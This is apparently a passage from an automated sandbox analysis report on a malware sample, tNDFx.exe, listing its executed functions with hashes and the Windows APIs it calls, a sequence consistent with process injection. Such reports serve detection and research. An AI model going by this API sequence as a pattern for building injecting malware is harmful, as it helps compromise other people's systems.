                                                  • Opcode Fuzzy Hash: f5ae1e149fe05b71ba298596e143b9a8e6dea67a493c022f9ecec300974b2bc2
                                                  • Instruction Fuzzy Hash: BB51E01150EBC64FE35397786CA66B17FE09F57210F0A01EBD489CB1E3D948AD99C3A2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Analysis Process: tNDFx.exe PID: 2288 Parent PID: 1320 tNDFx.exeCOMMON

                                                  Executed Functions

                                                  Function 001EA7A0, Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,001EA6BF,00000000,00000000), ref: 001EA810
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2128904217.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: f110c1270fba9bc001772d1be3872aff8c9fb7451a8b0a4ab14078a20937fde3
                                                  • Instruction ID: 726eeda79670662b79d24d51cac7091e3574daf365a266eb508fc54e821a0ba8
                                                  • Opcode Fuzzy Hash: f110c1270fba9bc001772d1be3872aff8c9fb7451a8b0a4ab14078a20937fde3
                                                  • Instruction Fuzzy Hash: 0A11F6B59046489FCB10CF99D484BDEBFF4EF88310F208419D558A7250D375AA55CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001E9FDC, Relevance: 1.6, APIs: 1, Instructions: 53nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,001EA6BF,00000000,00000000), ref: 001EA810
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2128904217.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: 6ce55becaca8e3c115670c0aa11983559a58466d7535ddb9735218a051cdad04
                                                  • Instruction ID: dd1fbc1f9b496b0262458a9ac1f27ea93155ef35a83aefbaa8321cb2c7e9b3c7
                                                  • Opcode Fuzzy Hash: 6ce55becaca8e3c115670c0aa11983559a58466d7535ddb9735218a051cdad04
                                                  • Instruction Fuzzy Hash: AA1104759046489FCB20CF9AD888BDEFBF4EF88320F608429E558A7210D775A954CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001ECC76, Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001ECEB6
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2128904217.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: eb63264998de104a0d11d3e9ca14389f3709ffa28c2e6cc6ee9e4f6696d6834f
                                                  • Instruction ID: 405dbde59c8fe822e480b67f51e7240995d3362ab5bee9adb852c89a283b6fa7
                                                  • Opcode Fuzzy Hash: eb63264998de104a0d11d3e9ca14389f3709ffa28c2e6cc6ee9e4f6696d6834f
                                                  • Instruction Fuzzy Hash: 66A14971D006998FDF20CFA9CC817EEBBB2BF48314F158569E808A7280D7759996CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001ECC80, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001ECEB6
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2128904217.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 59519bd8b1a07b8de0509f936ffa4e3503df66da8be46efbe09b6754998d7bd9
                                                  • Instruction ID: 29915d9e74136a104d643e88e8b3e948b21ca9c09da191933fd0794215273a0b
                                                  • Opcode Fuzzy Hash: 59519bd8b1a07b8de0509f936ffa4e3503df66da8be46efbe09b6754998d7bd9
                                                  • Instruction Fuzzy Hash: C1914971D006998FDF10CFA9CC817EEBBB2BF48314F158569E808A7280D7759986CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001EE560, Relevance: 1.7, APIs: 1, Instructions: 230COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 001EE5B9
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2128904217.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: e22eb28622bd2e0f9d7ec6e7cbc49f505b44e670868dccd4dc90915ac48d18ad
                                                  • Instruction ID: 9d715640a5274dfdc1d8aff9d9590cd69b6f33186b281c269f461632cb6d43d0
                                                  • Opcode Fuzzy Hash: e22eb28622bd2e0f9d7ec6e7cbc49f505b44e670868dccd4dc90915ac48d18ad
                                                  • Instruction Fuzzy Hash: F1A13970E00649CFDB18DFAAD898BDDBBF2BF48355F188019E015AB3A5D7359884DB24
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001EE288, Relevance: 1.7, APIs: 1, Instructions: 189COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 001EE50E
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2128904217.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                  Similarity
                                                  • API ID: KernelObjectSecurity
                                                  • String ID:
                                                  • API String ID: 3015937269-0
                                                  • Opcode ID: b8eafce5fa797b0a44143d98342a90a6749f1797c8ba253c4f716d6e6548e188
                                                  • Instruction ID: f6d70c122ccb0ca5193468025cfea55c5fbf753a4f381b1024ab28a3084f29f5
                                                  • Opcode Fuzzy Hash: b8eafce5fa797b0a44143d98342a90a6749f1797c8ba253c4f716d6e6548e188
                                                  • Instruction Fuzzy Hash: 1F71DD71D042888FCB15CFB9C854ADEBFF1AF89314F14816AE464AB391D7389A05CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001EE550, Relevance: 1.7, APIs: 1, Instructions: 158COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 001EE5B9
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2128904217.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 8aa428698b105621dfdd70bf33d18c724b68861422f53f8a2f22d5109492ad5b
                                                  • Instruction ID: 170fcc193ef81169b1df9800855cf45dcafeafffc22f31df9ed78ba1145de6b3
                                                  • Opcode Fuzzy Hash: 8aa428698b105621dfdd70bf33d18c724b68861422f53f8a2f22d5109492ad5b
                                                  • Instruction Fuzzy Hash: 34613970D00648CFDB14DFAAD998ADDBBF2FF48324F248119E015AB3A5D735A885DB24
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001EC3F0, Relevance: 1.6, APIs: 1, Instructions: 86injectionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 001EC488
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2128904217.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: d72387abd685ff6fdad1ab47457aa96d81f3023066ed19bd8f1d974ecf40a304
                                                  • Instruction ID: 6ede2eb39ab0b675855623675934bcc99268b6d63958c7d73e99de4e5e0e5862
                                                  • Opcode Fuzzy Hash: d72387abd685ff6fdad1ab47457aa96d81f3023066ed19bd8f1d974ecf40a304
                                                  • Instruction Fuzzy Hash: 68319C75D00649DFCF10CFAAC8847EEBBB1FF88314F10892AD565A7281D7789956CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001EC3F8, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 001EC488
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2128904217.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: c92574469c88dcc6f48a19925837243ad18235bab9ed4f5de8aab40b583113fd
                                                  • Instruction ID: e9d76b8a4d21bb7f667f8359b6ed6c6451bd65da539c4b873e3deaf78b48e0e7
                                                  • Opcode Fuzzy Hash: c92574469c88dcc6f48a19925837243ad18235bab9ed4f5de8aab40b583113fd
                                                  • Instruction Fuzzy Hash: C12127719003499FCB10CFA9C8847EEBBF5FF88314F10882AE918A7240D778A955CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001EB858, Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 001EB8DE
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2128904217.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 32ab4f55f67555983c708831de4cd2c155f63d65766a48cad48acb516156754e
                                                  • Instruction ID: a66e4ae5addf8b4996c31123051536eba1830c6a6a2a6b46bcaf6e7eebe082e7
                                                  • Opcode Fuzzy Hash: 32ab4f55f67555983c708831de4cd2c155f63d65766a48cad48acb516156754e
                                                  • Instruction Fuzzy Hash: 302157B1D046498FDB10CFAAC484BEEBBF4EF88314F14842AD419A7340D778AA45CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001EB860, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 001EB8DE
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2128904217.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: e291f323417defccb8945ef3c9e6c40ecbe2397fdbc702f8d76f7f7d9a915711
                                                  • Instruction ID: bd0ce0aa745b921f47fd1b997d298fe9fc30b476ff292d4e10d767959f48122f
                                                  • Opcode Fuzzy Hash: e291f323417defccb8945ef3c9e6c40ecbe2397fdbc702f8d76f7f7d9a915711
                                                  • Instruction Fuzzy Hash: EB210471D046498FDB10CFAAC484BEEBBF4EF88314F54842AD559A7340DB78AA45CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001EC6E8, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 001EC768
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2128904217.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 2bb4f1860f4b4145815f1f6c8ca51bbce0ee28fb704e3f17be707320859bf176
                                                  • Instruction ID: 7b7ae9faf09bb177914b42b2c175e9b31bc46961cbf5b2e8c0773a1a61e2a0d9
                                                  • Opcode Fuzzy Hash: 2bb4f1860f4b4145815f1f6c8ca51bbce0ee28fb704e3f17be707320859bf176
                                                  • Instruction Fuzzy Hash: 04212871D0024D9FCB10CFAAC8846DEFBB5FF88314F50882AE518A7240D778A955CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001EE490, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 001EE50E
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2128904217.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                  Similarity
                                                  • API ID: KernelObjectSecurity
                                                  • String ID:
                                                  • API String ID: 3015937269-0
                                                  • Opcode ID: 0a5bc2382cc06ac2ebe1860108189f48b3858cb401f72be75a2d4a95268f3b44
                                                  • Instruction ID: 1a95d74933a00fb108f306aef174eded966784414da2a7c40f2ffca7f71fd491
                                                  • Opcode Fuzzy Hash: 0a5bc2382cc06ac2ebe1860108189f48b3858cb401f72be75a2d4a95268f3b44
                                                  • Instruction Fuzzy Hash: 532127B19006498FCB10CF9AC484BDEBBF4EF88314F10842AE518A7340D778AA44CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001EC130, Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 001EC1A6
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2128904217.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 445e3d9792232b51c2664bbe96847bc60e48d014db0aacbdb0e336bef9401212
                                                  • Instruction ID: cf1d213a26178dc67ecdf69444651ea9826c9791cec8d7b803b67505cd180982
                                                  • Opcode Fuzzy Hash: 445e3d9792232b51c2664bbe96847bc60e48d014db0aacbdb0e336bef9401212
                                                  • Instruction Fuzzy Hash: 031153729002488FCB10CFA9C844BEEBBB1AF88310F20881AE525A7240C775AA55CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001EC138, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 001EC1A6
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2128904217.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: fe5d848a0159e8d8a87e1e4ebe90ee43389172f1c34a14187b5e8630745e6cbb
                                                  • Instruction ID: 03a080c9372622ac814972a4986e78b4035fc3a307fa29545d433b0a7faaaec3
                                                  • Opcode Fuzzy Hash: fe5d848a0159e8d8a87e1e4ebe90ee43389172f1c34a14187b5e8630745e6cbb
                                                  • Instruction Fuzzy Hash: B2112372900249DFCB10CFAAC844BDFBBF5EF88314F10881AE925A7250D775AA55CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001ED658, Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2128904217.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 4de5adb0607533cd3f82b0c68ae90dd558eb5a0a61f081c462b2a124bbf5364a
                                                  • Instruction ID: 05e649842481b34afd14f3841cafbae511568466c5ca004651028ec1b0726d23
                                                  • Opcode Fuzzy Hash: 4de5adb0607533cd3f82b0c68ae90dd558eb5a0a61f081c462b2a124bbf5364a
                                                  • Instruction Fuzzy Hash: F81134719046488FCB20CFAAD4487EEFBF4AF88314F20881AC529A7640D779AA45CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 001ED660, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2128904217.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: b630ada7f91dc375488651a9f5a053a0748edd72a43c683c39b45c7b4cea6760
                                                  • Instruction ID: 0bed55e292d69bb42201e03c2682731f89261f44eb5a36103d385bede391c9a1
                                                  • Opcode Fuzzy Hash: b630ada7f91dc375488651a9f5a053a0748edd72a43c683c39b45c7b4cea6760
                                                  • Instruction Fuzzy Hash: 131125B1D046488FCB10DFAAD4487DEFBF5EF88214F20881AD519A7240D779A944CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Analysis Process: tNDFx.exe PID: 2484 Parent PID: 2288 tNDFx.exeCOMMON

                                                  Executed Functions

                                                  Function 00863328, Relevance: 14.3, Strings: 11, Instructions: 574COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2351416134.0000000000860000.00000040.00000001.sdmp, Offset: 00860000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 5$5$5$5$5$fCyl$fCyl$fCyl$fCyl$fCyl$fCyl
                                                  • API String ID: 0-2107989583
                                                  • Opcode ID: 6a65508d67dbf233cd541204c3dc3527d42bc321d2e14d98073e23224e78fc8b
                                                  • Instruction ID: f57497464def53b9b5235c8dafbcf315dbec1b5aee74b7683fe389f3bae072fc
                                                  • Opcode Fuzzy Hash: 6a65508d67dbf233cd541204c3dc3527d42bc321d2e14d98073e23224e78fc8b
                                                  • Instruction Fuzzy Hash: DF229B30F042449FDB14DBA8D895BAEBBF6EF89300F168469E405EB396DB30ED058B51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0086D8A0, Relevance: 10.4, Strings: 8, Instructions: 391COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2351416134.0000000000860000.00000040.00000001.sdmp, Offset: 00860000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fCyl$fCyl$fCyl$fCyl$fCyl$fCyl$fCyl$fCyl
                                                  • API String ID: 0-4140245012
                                                  • Opcode ID: 9259b7588e809b1fddd8111ddbbdc36871fb27a05d78a6fea639d27821e67d9c
                                                  • Instruction ID: b1804433253d9b1120e6d73c7e9ada4689b9e21826ea33cef1c15541d8b30c35
                                                  • Opcode Fuzzy Hash: 9259b7588e809b1fddd8111ddbbdc36871fb27a05d78a6fea639d27821e67d9c
                                                  • Instruction Fuzzy Hash: 86D19C30B002445FDB14FBB8D865BAEB6E6EF88744F158928E51AEB385DF70AC058794
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0086F510, Relevance: 6.7, Strings: 5, Instructions: 421COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2351416134.0000000000860000.00000040.00000001.sdmp, Offset: 00860000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fCyl$fCyl$fCyl$fCyl$fCyl
                                                  • API String ID: 0-2137200589
                                                  • Opcode ID: b0bc95db06503e02372a1c67f56809d915cb717b6efe16226d45b60437514365
                                                  • Instruction ID: c3cb35c161c9651d354b1e24b67199c607f6dee0ab445e58cb02d688ca5f4f46
                                                  • Opcode Fuzzy Hash: b0bc95db06503e02372a1c67f56809d915cb717b6efe16226d45b60437514365
                                                  • Instruction Fuzzy Hash: 89E1ED30B042449FDB04DBB8D855BAE7BB2EF85304F198479E505EB692DB34DC49CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00869BC8, Relevance: 5.8, Strings: 4, Instructions: 838COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2351416134.0000000000860000.00000040.00000001.sdmp, Offset: 00860000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fCyl$fCyl$fCyl$fCyl
                                                  • API String ID: 0-1489765667
                                                  • Opcode ID: 1f653519a28722b1ff28d1a91ac100c1067e19c32cd1998c15a16b9cf9eb18f1
                                                  • Instruction ID: e420bcc3c6295fe5a12ea83f550f993575ff248c8bec572aa0d000439e293d34
                                                  • Opcode Fuzzy Hash: 1f653519a28722b1ff28d1a91ac100c1067e19c32cd1998c15a16b9cf9eb18f1
                                                  • Instruction Fuzzy Hash: 3D724E34A002048FCB54EB74D8986ADBBB6FF88305F1585A9E909EB791DF349C86CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00869B28, Relevance: 5.8, Strings: 4, Instructions: 793COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2351416134.0000000000860000.00000040.00000001.sdmp, Offset: 00860000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fCyl$fCyl$fCyl$fCyl
                                                  • API String ID: 0-1489765667
                                                  • Opcode ID: 84f285eb414f3210a7ab4f057a49469b4b287b269b67e555dee07cb7f7ed1df6
                                                  • Instruction ID: 10788bd443c48dce3d7a94581caae71c34d336c08ae7053302c2afb23a41d52c
                                                  • Opcode Fuzzy Hash: 84f285eb414f3210a7ab4f057a49469b4b287b269b67e555dee07cb7f7ed1df6
                                                  • Instruction Fuzzy Hash: 82624E34A002048FCB54EB74D8986ADB7B6FF88305F1585A9E909EB791DF34AC86CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 007D0898, Relevance: 3.3, Strings: 2, Instructions: 760COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2351383479.00000000007D0000.00000040.00000001.sdmp, Offset: 007D0000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fCyl$fCyl
                                                  • API String ID: 0-2324532761
                                                  • Opcode ID: 13b4c42d0d479c2e93f84139165f93235a4add8e3c07627798fa269868fd4d5d
                                                  • Instruction ID: e7cc35f249a8d6b151b2997fa8d6fdc2b769e118df598d1bdb62056d223c46a5
                                                  • Opcode Fuzzy Hash: 13b4c42d0d479c2e93f84139165f93235a4add8e3c07627798fa269868fd4d5d
                                                  • Instruction Fuzzy Hash: 7D620A31E006199FCB64EF78C8546DEB7B5AF89300F5086A9D449AB751EF30AA85CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00860048, Relevance: 3.1, Instructions: 3108COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2351416134.0000000000860000.00000040.00000001.sdmp, Offset: 00860000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 44b85fb172186ecb1dfd7e798fd33cfaef1197e229743e1d7c3d727b0727f10a
                                                  • Instruction ID: b54d9b977db30675c9dfb5b8b2970e5c904b76fc427dbb3e220545cc0d75ef71
                                                  • Opcode Fuzzy Hash: 44b85fb172186ecb1dfd7e798fd33cfaef1197e229743e1d7c3d727b0727f10a
                                                  • Instruction Fuzzy Hash: F3631E30D10B598ECB11EF68C854699F7B1FF95300F15C7AAE458AB261EB70AAC4CF81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00365960, Relevance: 2.8, Strings: 2, Instructions: 281COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,GQk$JQk
                                                  • API String ID: 0-3597482100
                                                  • Opcode ID: 54a47cafeb82e32638eb139ab8402723bdb5b5957807bf4651c8a18dc40db65c
                                                  • Instruction ID: 7bbb09c99fed386097720a750cfe50a96c3872544d6dc5e834cb26d92b38945e
                                                  • Opcode Fuzzy Hash: 54a47cafeb82e32638eb139ab8402723bdb5b5957807bf4651c8a18dc40db65c
                                                  • Instruction Fuzzy Hash: 1BB13570E046098FDB15CFA9C8857EEBBF2AF88304F15C139D815EB298EB749845CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00365618, Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,GQk$JQk
                                                  • API String ID: 0-3597482100
                                                  • Opcode ID: 7ddd1dc250acb292aa5013f8caab48d3aff7e8a41da3c31350141d4b23918431
                                                  • Instruction ID: a9adccde775e9981c034c48205c2e30dcaf4bfdf0517bda2ce404f299928db96
                                                  • Opcode Fuzzy Hash: 7ddd1dc250acb292aa5013f8caab48d3aff7e8a41da3c31350141d4b23918431
                                                  • Instruction Fuzzy Hash: BA914770E00609CFDB15CFA9C9817DEBBF2AF88304F25C139E405A7698EB749845CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00362389, Relevance: 2.1, Strings: 1, Instructions: 821COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 45
                                                  • API String ID: 0-2889884971
                                                  • Opcode ID: 62a73495c56d4ff4bbe6ca83194189bce005e2474d9d4489a6d0c6c6dc79fdda
                                                  • Instruction ID: 5cdb3a90ee83c13ff83d555c969c22e5031c0301770209d83ae51249218ba3ee
                                                  • Opcode Fuzzy Hash: 62a73495c56d4ff4bbe6ca83194189bce005e2474d9d4489a6d0c6c6dc79fdda
                                                  • Instruction Fuzzy Hash: 7F52F3307087808FD716AB74D85076E3BE2AF86304F16C9AAD045CB7AADF75DC498B61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00869098, Relevance: 2.0, Strings: 1, Instructions: 774COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2351416134.0000000000860000.00000040.00000001.sdmp, Offset: 00860000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: T4X
                                                  • API String ID: 0-1248752975
                                                  • Opcode ID: d1d0947bbed871d01bb5648019526357251ce3ee983b91ad5a69d1d5360f9732
                                                  • Instruction ID: c7ffbe5acca48525bdab1ed14d6ed320bbd40d25f61810fbe890607f6cb6014a
                                                  • Opcode Fuzzy Hash: d1d0947bbed871d01bb5648019526357251ce3ee983b91ad5a69d1d5360f9732
                                                  • Instruction Fuzzy Hash: 1652CD30A002098FDB24DFA4C4946AEB7E6FF85314F258929E445EF795DB34DC86CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0036C2A9, Relevance: 1.7, Strings: 1, Instructions: 471COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: T4X
                                                  • API String ID: 0-1248752975
                                                  • Opcode ID: 92a069823f5a6c3d8c32ee66e75bde7d6249b0b7bee044e53999543c1dd1c580
                                                  • Instruction ID: 6529e4f7b1628c356c514d14d760269f64887886c63afd146ecac75589472692
                                                  • Opcode Fuzzy Hash: 92a069823f5a6c3d8c32ee66e75bde7d6249b0b7bee044e53999543c1dd1c580
                                                  • Instruction Fuzzy Hash: DD02D534B093804FD703AB7498646AE3BE29F86304F19C4BAD545DF796DB78DC0A8B51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00366230, Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: JQk
                                                  • API String ID: 0-798154149
                                                  • Opcode ID: da3953e536f76eef6a3795ade335f8e2d5b0b5e3013d882cec06204deec7d202
                                                  • Instruction ID: cb4046be20d07314aba81f45191ca0c06bc3ae6977359fcac1cb09149c3e4be1
                                                  • Opcode Fuzzy Hash: da3953e536f76eef6a3795ade335f8e2d5b0b5e3013d882cec06204deec7d202
                                                  • Instruction Fuzzy Hash: 16B14C70E002098FDB15CFA9C8867EEBBF2AF88354F25C529D415E7398EB749845CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 008685C0, Relevance: .8, Instructions: 771COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2351416134.0000000000860000.00000040.00000001.sdmp, Offset: 00860000, based on PE: false
                                                  Similarity
                                                  • API ID:
